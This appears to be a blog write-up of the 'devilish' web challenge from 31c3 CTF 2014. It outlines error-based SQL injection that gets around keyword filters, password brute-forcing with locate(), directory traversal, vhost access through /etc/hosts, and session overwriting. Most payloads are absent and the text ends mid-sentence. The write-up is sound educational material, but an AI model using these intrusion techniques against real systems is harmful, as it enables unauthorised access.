I'll talk about devilish a web challenge from the 31c3ctf 2014 CTF. I'll give credit to one of our team members on this one "Michael", because we were both working on this challenge.
Well lets get to business with the devilish 30 points challenge. 24 teams solved it.
Here is the description of the challenge:
It's some devilish community public portal, we're pretty sure there's something else out there, a private portal maby, we'd like to know the secret behind it
When we go to the web page we can see a nice vampire-sh web page :
After some research we can see that there is a sql injection vulnerability in the PROFILE page. The problem is that the font used by the web page is with Halloween images and you need to show the HTML source all the time to see the error message from the sql injection. So one of our team members Michael had the idea to disable firefox option. So juste set the option to false.
Above you have the page before changing the and here it is after:
OK, so now we know where the injection is and we can run commands. But there are a lot of filters that don't allow us to enumerate columns. information_schema, table, or, union all of these are filtered, so we need to find a way around it. What we need is the password column name to be able to login.
To enumerate the columns without the above keywords we can do error based sql injection with duplicate keys error. This will enumerate the columns for us. So the final exploit for the sql column problem is :
Witch gives us :
This is the column we need to extract the password from. So let's do that:
But when we try to log in with the password it doesn't work. So may be the error does not show all the chars from the password. We need to bruteforce the reste of the password with locate(). Here is a script that Michael made really fast:
Which gives us Dracula's account password:
After logging in, we found easily a directory traversal vulnerability that lets us understand that there is another site on the server as said in the challenge description. This source-code is different from the original site in /var/www/html:
We can also see the code source of some pages that gives us a precious information for the next step:
http://188.40.18.70/__WebSiteFuckingPrivateContentNotForPublic666/LOGIN_HEAD
show us the following code:
An here is the LOGIN_HEAD from devilish.local:
So we need to access the second web page but how. Well you have 2 options. One you use curl and modify the Host parameter or you modify your /etc/hosts and add:
188.40.18.70 devilish.localWe used the second one, its more nice to do it with the web browser :). But when we go to the devilish.local web page there is no login option. And we can see this on the INDEX page:
So may be the 2 webpages use the same session. So we go back to the first site and log in but this time we send the parameter
So we use firefox's hackbar and send this:$_SESSION=$_POST;
url :
So the
No comments:
Post a Comment